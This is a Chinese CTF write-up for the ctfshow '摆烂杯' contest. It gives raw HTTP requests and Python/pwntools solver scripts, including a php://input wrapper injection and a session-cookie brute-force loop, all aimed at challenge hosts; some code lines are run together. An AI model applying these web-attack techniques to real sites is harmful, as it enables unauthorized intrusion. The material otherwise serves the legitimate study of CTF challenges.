一行代码

POST /?filename=php://input&id=0&content=Ww234567811 HTTP/1.1
Host: b5ea7e47-c730-441e-87fd-dfe2aa8c3011.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 15
Origin: http://b5ea7e47-c730-441e-87fd-dfe2aa8c3011.challenge.ctf.show
Connection: close
Referer: http://b5ea7e47-c730-441e-87fd-dfe2aa8c3011.challenge.ctf.show/?filename=php:%2f%2finput&id=0&content%5B%5D=Ww234567811
Upgrade-Insecure-Requests: 1welcome2ctfshow

web签到

POST / HTTP/1.1
Host: ea06d063-5bfc-40d3-a0a4-47eaafa995bc.challenge.ctf.show
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:95.0) Gecko/20100101 Firefox/95.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 47
Origin: http://ea06d063-5bfc-40d3-a0a4-47eaafa995bc.challenge.ctf.show
Connection: close
Referer: http://ea06d063-5bfc-40d3-a0a4-47eaafa995bc.challenge.ctf.show/
Upgrade-Insecure-Requests: 1A=1-1&B=(4/100000000000000)**(1/3)&C=114**(1/3)

黑客网站

访问地址，没有任何的显示
查看源码发现了一些字母

组合一下得到网址
http://tyros4qws3mmbubgjqje46ncv35jaqjgeb3nqiuf23ijoj4zwasxohyd.onion
让后就不会了。。。

日积月累

import requests
import randomr = requests.session()
asc = "ABCDEFGHIJ"
dig = "0123456789"
url = "http://207f2ce3-e9cf-419d-a98e-9dbfc0e47f45.challenge.ctf.show/"
data={"meizi_id":"A1"
}
res = r.post(url+"/check",data=data)
mycookie = r.cookies.get_dict()["session"]
lis = [i+j for i in asc for j in dig]
count = 0while True:c = random.choice(lis)data = {"meizi_id" : c}r.get(url+"/start")res = r.post(url+"/check",data=data)newcookie = r.cookies.get_dict()["session"]# print(data)# print("1 : "+mycookie)# print("2 : "+newcookie)if "eyJyb3VuZF9zIjowfQ" in newcookie:r.cookies.clear()c = requests.sessions.RequestsCookieJar()c.set("session",mycookie)r.cookies.update(c)continuemycookie = newcookie# lis.remove(c)count += 1print(str(count)+" : " + c +" : "+mycookie)

春哥VS曾哥

找到一篇讲这个n mod x = y mod n的
https://www.bilibili.com/read/cv13810810

from pwn import *
import rehost = "pwn.challenge.ctf.show"
port = 28185io = remote(host=host,port=port)while True:content = io.recv().decode()print(content)res = re.findall(r"= \((.*?), (.*?)\)",content)x , y = res[0]x , y = int(x),int(y)if x > y :n = x + yelif x < y:n = y - y % x // 2else:n = xio.sendline(str(n).encode()) sleep(0.1)
io.close()

获取flag

ctfshow摆烂杯相关推荐

ctfshow 摆烂杯web wp
考试前不想复(预)习,正好是ctfshow的摆烂杯,就去做了几道web题文章目录 web签到黑客网站一行代码 web签到题目要输入三个整数A.B.C,ABC均不可为0,让A³+B³+C³=11 ...
ctfshow 摆烂杯
套套的套套这题是在服务器上运行了一个pwn程序,我们需要走出这个类似迷宫的,每次过一个关卡就会获得0.25%flag的flag也就是说我们大概需要走400次才能拿到flag,而且环境快到期的时候要记 ...
【蓝桥杯回力篇】蓝桥模拟赛【摆烂day1】
前言最近在忙的写东西,蓝桥已经是摆烂的状态了. 终归是交了钱的,还是得在最后十天练习练习. 1.A的个数以下是一个 25 行 25 列的字母矩阵,全部由字母 A 和 B 组成. AAAAAAABA ...
网络攻防技术(摆烂一天）
网络攻防技术非常基础 1. 信息采集信息采集的重点概念: 信息采集是黑客为了更有效的实施攻击而在攻击前对被攻击目标进行探测活动(信息渗透的过程) 信息采集是渗透重要的一部分:知道的越多就可能知道的更 ...
ctfshow—2023愚人杯wp
ctfshow-2023愚人杯wp 热身热身 100 愚人杯比赛秉承欢乐.有爱.进取的精神在群里师傅热心帮助下,已经开始第三届比赛啦! 欢迎各位师傅参加,希望大家玩的开心,比赛题目可以自由讨论.但 ...
UE风格化Day9-（摆烂特辑）原神石块砖材质欣赏
因为要肝课程作业所以没时间了,所以没有进度产出,摆烂了一天接下来要做石块砌体和地砖材质,先来参考参考原神材质(绝对不是摆烂玩游戏雷树的场地:可以看到叠加了很多层细节,而且裂缝和苔藓纹理是不与砖块重 ...
软件测试“摆烂”已经成为常态化，我们应该怎样冲出重围?
网络日新月异发展的今天,每隔一段时间就会出现一些新的网络热词,最近"摆烂"成功突出重围,成为大家热议的中心.什么是"摆烂"?"摆烂"就是事情 ...
小王的摆烂日记之6月工作总结
数引系统基本已经完了,注意一下以后写算法一定要先写伪代码,别摆烂卡尔曼滤波掌握的还可以,之后可以看一下惯导与GNSS数据融合的代码之后的相关工作,DD的红外目标识别与追踪先做调研!!!!
ctfshow卷王杯部分web
ctfshow卷王杯web部分[easy unserialize&easy web] 文章目录 ctfshow卷王杯web部分[easy unserialize&easy web] e ...

ctfshow摆烂杯

一行代码

web签到

黑客网站

日积月累

春哥VS曾哥

ctfshow摆烂杯相关推荐

最新文章

热门文章